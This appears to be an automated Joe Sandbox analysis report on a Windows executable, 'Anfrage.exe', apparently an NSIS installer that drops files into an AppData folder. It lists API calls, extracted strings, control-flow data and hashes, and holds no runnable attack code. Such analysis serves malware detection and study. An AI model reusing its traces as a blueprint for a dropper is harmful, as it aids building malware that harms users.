                                                                          control_flow_graph 556 405665-40568b call 405923 559 4056a4-4056ab 556->559 560 40568d-40569f DeleteFileA 556->560 562 4056ad-4056af 559->562 563 4056be-4056ce call 405dc3 559->563 561 40582e-405832 560->561 564 4056b5-4056b8 562->564 565 4057dc-4057e1 562->565 571 4056d0-4056db lstrcatA 563->571 572 4056dd-4056de call 40587c 563->572 564->563 564->565 565->561 567 4057e3-4057e6 565->567 569 4057f0-4057f8 call 4060c7 567->569 570 4057e8-4057ee 567->570 569->561 580 4057fa-40580e call 405835 call 40561d 569->580 570->561 574 4056e3-4056e6 571->574 572->574 576 4056f1-4056f7 lstrcatA 574->576 577 4056e8-4056ef 574->577 579 4056fc-40571a lstrlenA FindFirstFileA 576->579 577->576 577->579 581 405720-405737 call 405860 579->581 582 4057d2-4057d6 579->582 595 405810-405813 580->595 596 405826-405829 call 404fdc 580->596 589 405742-405745 581->589 590 405739-40573d 581->590 582->565 584 4057d8 582->584 584->565 593 405747-40574c 589->593 594 405758-405766 call 405dc3 589->594 590->589 592 40573f 590->592 592->589 599 4057b1-4057c3 FindNextFileA 593->599 600 40574e-405750 593->600 606 405768-405770 594->606 607 40577d-405788 call 40561d 594->607 595->570 597 405815-405824 call 404fdc call 405c7e 595->597 596->561 597->561 599->581 603 4057c9-4057cc FindClose 599->603 600->594 604 405752-405756 600->604 603->582 604->594 604->599 606->599 609 405772-40577b call 405665 606->609 616 4057a9-4057ac call 404fdc 607->616 617 40578a-40578d 607->617 609->599 616->599 618 4057a1-4057a7 617->618 619 40578f-40579f call 404fdc call 405c7e 617->619 618->599 619->599
                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040568E
                                                                          • lstrcatA.KERNEL32(0042B870,\*.*,0042B870,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D6
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B870,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056F7
                                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B870,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056FD
                                                                          • FindFirstFileA.KERNEL32(0042B870,?,?,?,0040A014,?,0042B870,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040570E
                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004057BB
                                                                          • FindClose.KERNEL32(00000000), ref: 004057CC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405672
                                                                          • \*.*, xrefs: 004056D0
                                                                          • "C:\Users\user\Desktop\Anfrage.exe", xrefs: 00405665
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                          • API String ID: 2035342205-4126993274
                                                                          • Opcode ID: 35f83909ae11c9f79d6b7d90eabebb09b3e9f21799a89a441620f803e9e91570
                                                                          • Instruction ID: 999a98db12b4221591f7ee6b6052c292a74d4854a5648a1040a4d82dc32c8f45
                                                                          • Opcode Fuzzy Hash: 35f83909ae11c9f79d6b7d90eabebb09b3e9f21799a89a441620f803e9e91570
                                                                          • Instruction Fuzzy Hash: 2B51D531800A48EADB216B61CC85BBF7A78DF42354F64817BF845721D2C73C4952EE6D
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(75573410,0042C0B8,0042BC70,00405966,0042BC70,0042BC70,00000000,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 004060D2
                                                                          • FindClose.KERNELBASE(00000000), ref: 004060DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 7d865761c494c6b641247bef0bb2c924160845ff3ef93fdcf2db6d5e6c47237c
                                                                          • Instruction ID: 7bd6a1ee080489a50caeda4c967685e5e64830a7ebee4117dda32410da358e49
                                                                          • Opcode Fuzzy Hash: 7d865761c494c6b641247bef0bb2c924160845ff3ef93fdcf2db6d5e6c47237c
                                                                          • Instruction Fuzzy Hash: 5FD012316854309BC21097786D0C84B7A589F19331711CB37F4A6F11F0CB34CC66869D
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 0040271A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: 9221aa77ab26fe255a706fdbb407d63210ae3e038afe0839ecce60615a5a5cc7
                                                                          • Instruction ID: c78e1de3aafbb837fdaa481cd05ce35d28cdafaef4a854467420e3d3da5db3c0
                                                                          • Opcode Fuzzy Hash: 9221aa77ab26fe255a706fdbb407d63210ae3e038afe0839ecce60615a5a5cc7
                                                                          • Instruction Fuzzy Hash: 18F0A7726041159BD710EBA49A49DEEB778DF15324F60417BF181B20C1D6B84A469B2A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          (control-flow graph rendering for function 00403AD5; basic-block edge data omitted)
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B11
                                                                          • ShowWindow.USER32(?), ref: 00403B2E
                                                                          • DestroyWindow.USER32 ref: 00403B42
                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B5E
                                                                          • GetDlgItem.USER32(?,?), ref: 00403B7F
                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B93
                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403B9A
                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403C48
                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403C52
                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403C6C
                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CBD
                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403D63
                                                                          • ShowWindow.USER32(00000000,?), ref: 00403D84
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D96
                                                                          • EnableWindow.USER32(?,?), ref: 00403DB1
                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DC7
                                                                          • EnableMenuItem.USER32(00000000), ref: 00403DCE
                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DE6
                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DF9
                                                                          • lstrlenA.KERNEL32(0042A868,?,0042A868,Hves Setup), ref: 00403E22
                                                                          • SetWindowTextA.USER32(?,0042A868), ref: 00403E31
                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403F65
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                          • String ID: Hves Setup
                                                                          • API String ID: 3282139019-2374466059
                                                                          • Opcode ID: da448d94bc17f5267805ab40a90d87622891c5bcd4f6a4fe796976a1d19e5176
                                                                          • Instruction ID: dc7e82238fa4606f4707b849198a3fa7e113026ae2232510f5cb024fb41842d5
                                                                          • Opcode Fuzzy Hash: da448d94bc17f5267805ab40a90d87622891c5bcd4f6a4fe796976a1d19e5176
                                                                          • Instruction Fuzzy Hash: 89C1AF71604605ABDB206F22EE45E2B3EBCEB4570AF40053EF642B11F1CB79A942DB1D

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          (control-flow graph rendering for function 00403743; basic-block edge data omitted)
                                                                          APIs
                                                                            • Part of subcall function 0040615C: GetModuleHandleA.KERNEL32(?,?,?,0040320D,00000009), ref: 0040616E
                                                                            • Part of subcall function 0040615C: GetProcAddress.KERNEL32(00000000,?), ref: 00406189
                                                                          • lstrcatA.KERNEL32(1033,0042A868,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A868,00000000,00000002,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Anfrage.exe",00000000), ref: 004037BE
                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\secretaryships,1033,0042A868,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A868,00000000,00000002,75573410), ref: 00403833
                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403846
                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403851
                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\secretaryships), ref: 0040389A
                                                                            • Part of subcall function 00405D21: wsprintfA.USER32 ref: 00405D2E
                                                                          • RegisterClassA.USER32(0042EBA0), ref: 004038D7
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004038EF
                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403924
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 0040395A
                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403986
                                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403993
                                                                          • RegisterClassA.USER32(0042EBA0), ref: 0040399C
                                                                          • DialogBoxParamA.USER32(?,00000000,00403AD5,00000000), ref: 004039BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\secretaryships$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                          • API String ID: 1975747703-761011233
                                                                          • Opcode ID: a076f8ec2402cbae9f3fe9b816078eb7bdbed0063d8e43fd154ff60ee66dea9a
                                                                          • Instruction ID: b4fd17e6ad5735db6f0d6fe5a96b28392e8485eca6c7d92ade12033e63288973
                                                                          • Opcode Fuzzy Hash: a076f8ec2402cbae9f3fe9b816078eb7bdbed0063d8e43fd154ff60ee66dea9a
                                                                          • Instruction Fuzzy Hash: C261D8716446407ED720BF669D45F273EACDB54749F80447FF941B22E2CBBC99028A2D

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          (control-flow graph rendering for function 00402CFA; basic-block edge data omitted)
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402D0B
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Anfrage.exe,00000400), ref: 00402D27
                                                                            • Part of subcall function 00405A36: GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405A3A
                                                                            • Part of subcall function 00405A36: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Anfrage.exe,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00402D73
                                                                          Strings
                                                                          • C:\Users\user\Desktop, xrefs: 00402D55, 00402D5A, 00402D60
                                                                          • soft, xrefs: 00402DE8
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D01
                                                                          • Inst, xrefs: 00402DDF
                                                                          • C:\Users\user\Desktop\Anfrage.exe, xrefs: 00402D11, 00402D20, 00402D34, 00402D54
                                                                          • Null, xrefs: 00402DF1
                                                                          • Error launching installer, xrefs: 00402D4A
                                                                          • "C:\Users\user\Desktop\Anfrage.exe", xrefs: 00402CFA
                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Anfrage.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                          • API String ID: 4283519449-574202934
                                                                          • Opcode ID: ff9acb172ce84b9ab5053db9bc38736bf02bbbb4910f3b2cd7bac771f2685801
                                                                          • Instruction ID: d5918a9216ca672954190790a9c5efd9bc82950644bb13a7859279fc2a8a748f
                                                                          • Opcode Fuzzy Hash: ff9acb172ce84b9ab5053db9bc38736bf02bbbb4910f3b2cd7bac771f2685801
                                                                          • Instruction Fuzzy Hash: 9F51EB71940215ABDB20AF64DE89B9F7BB8EB14355F50403BF900B72D1C7B88D858BAD

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          (control-flow graph rendering for function 00401759; basic-block edge data omitted)
                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic,00000000,00000000,00000031), ref: 00401798
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic,00000000,00000000,00000031), ref: 004017C2
                                                                            • Part of subcall function 00405DC3: lstrcpynA.KERNEL32(?,?,00000400,00403251,Hves Setup,NSIS Error), ref: 00405DD0
                                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000,?), ref: 00405015
                                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0040308E,0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000), ref: 00405025
                                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0042A048,0040308E,0040308E,0042A048,00000000,0041C020,755723A0), ref: 00405038
                                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0042A048,0042A048), ref: 0040504A
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nskF5B7.tmp$C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll$C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic$Call
                                                                          • API String ID: 1941528284-3215872003
                                                                          • Opcode ID: dbd51bdbfd1ce860f4c1c765c855f49dbf4a1797cd8297ab6e253aaa72fcfa08
                                                                          • Instruction ID: 615a3562c55b05fa993605831867e42c155a1137a6b97b034e6d1829953e469f
                                                                          • Opcode Fuzzy Hash: dbd51bdbfd1ce860f4c1c765c855f49dbf4a1797cd8297ab6e253aaa72fcfa08
                                                                          • Instruction Fuzzy Hash: E541D572910515BBCF107BB5DC49EAF3679EF05368F20823BF121B20E1D67C8A518A6D

                                                                          Control-flow Graph (function at 00402F33; graph image and node/edge list not reproduced)
                                                                          Similarity
                                                                          • API ID: CountTick$wsprintf
                                                                          • String ID: TA$ TA$... %d%%$;mA
                                                                          • API String ID: 551687249-2794615820
                                                                          • Opcode ID: 205d5d13d599fec26c2c222d56ddb78c5c9a5f9a8d28ce79d18f424d9808a9fb
                                                                          • Instruction ID: 17fda0b725f1c36f5789cb51541ed76e7f3e8dd53de897cd261334f9a9fb1752
                                                                          • Opcode Fuzzy Hash: 205d5d13d599fec26c2c222d56ddb78c5c9a5f9a8d28ce79d18f424d9808a9fb
                                                                          • Instruction Fuzzy Hash: 4F519D71901219DBCB10DF65DA44B9E7BB8EF08366F10813BE810B72D0D7789A41CBAD

                                                                          Control-flow Graph (function at 004054A2; graph image and node/edge list not reproduced)
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054E5
                                                                          • GetLastError.KERNEL32 ref: 004054F9
                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040550E
                                                                          • GetLastError.KERNEL32 ref: 00405518
                                                                          Strings
                                                                          • C:\Users\user\Desktop, xrefs: 004054A2
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004054C8
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                          • API String ID: 3449924974-1326413622
                                                                          • Opcode ID: 45a109fca96412ce29b98a5dc57c77bd9b21184e8ca6d4253022bd40daed81d6
                                                                          • Instruction ID: 8f3a1ad4c11c26192a8320527681c6b281dda8cd8d23604747c1fe251039353f
                                                                          • Opcode Fuzzy Hash: 45a109fca96412ce29b98a5dc57c77bd9b21184e8ca6d4253022bd40daed81d6
                                                                          • Instruction Fuzzy Hash: 2101E571D10619EADF119FA4CA047EFBFB8EB14355F00403AD945B6180D77896488FA9

                                                                          Control-flow Graph (function at 004060EE; graph image and node/edge list not reproduced)
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406105
                                                                          • wsprintfA.USER32 ref: 0040613E
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406152
                                                                          Similarity
                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                          • API String ID: 2200240437-4240819195
                                                                          • Opcode ID: 22b859301be01545360faa7ed4cfae0610cf7599f3afabecce9a192d73219230
                                                                          • Instruction ID: f3b8c8f840e4a68c7bce26bfc9f978bd3a53690dd24d0c1e4954f7cf1b20607f
                                                                          • Opcode Fuzzy Hash: 22b859301be01545360faa7ed4cfae0610cf7599f3afabecce9a192d73219230
                                                                          • Instruction Fuzzy Hash: BEF0217054020AA7DB149B64DD0DFFB379CBB08305F14047AA587F50C2D5B8D5358B58

                                                                          Control-flow Graph (function at 004023D3; graph image and node/edge list not reproduced)
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
                                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                          Similarity
                                                                          • API ID: CloseCreateValuelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nskF5B7.tmp
                                                                          • API String ID: 1356686001-654820475
                                                                          • Opcode ID: 16c11ee55e493c1f4cb55922a7a265c15d1edf48fbcc260bb9481044d91f603c
                                                                          • Instruction ID: 78945337bfecb372f974009004526856e4df2419c5d7c36b02de55c30b310c87
                                                                          • Opcode Fuzzy Hash: 16c11ee55e493c1f4cb55922a7a265c15d1edf48fbcc260bb9481044d91f603c
                                                                          • Instruction Fuzzy Hash: 842162B1E00208BEEB10EFA4DE49EAF7678EB54358F20403AF545B61D0C6B94D419B68

                                                                          Control-flow Graph (function at 00401FFF; graph image and node/edge list not reproduced)
                                                                          APIs
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202A
                                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000,?), ref: 00405015
                                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0040308E,0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000), ref: 00405025
                                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0042A048,0040308E,0040308E,0042A048,00000000,0041C020,755723A0), ref: 00405038
                                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0042A048,0042A048), ref: 0040504A
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203A
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4
                                                                          Similarity
                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID: xZf
                                                                          • API String ID: 2987980305-1093046601
                                                                          • Opcode ID: 180a3081fb3f78eb91f00a12e3d21899e8b163c30cc106c56dc37463dfcc7d01
                                                                          • Instruction ID: b783eae22080e2a76f4456b755c5680fa053b08e058d045f217a77597ec219f0
                                                                          • Opcode Fuzzy Hash: 180a3081fb3f78eb91f00a12e3d21899e8b163c30cc106c56dc37463dfcc7d01
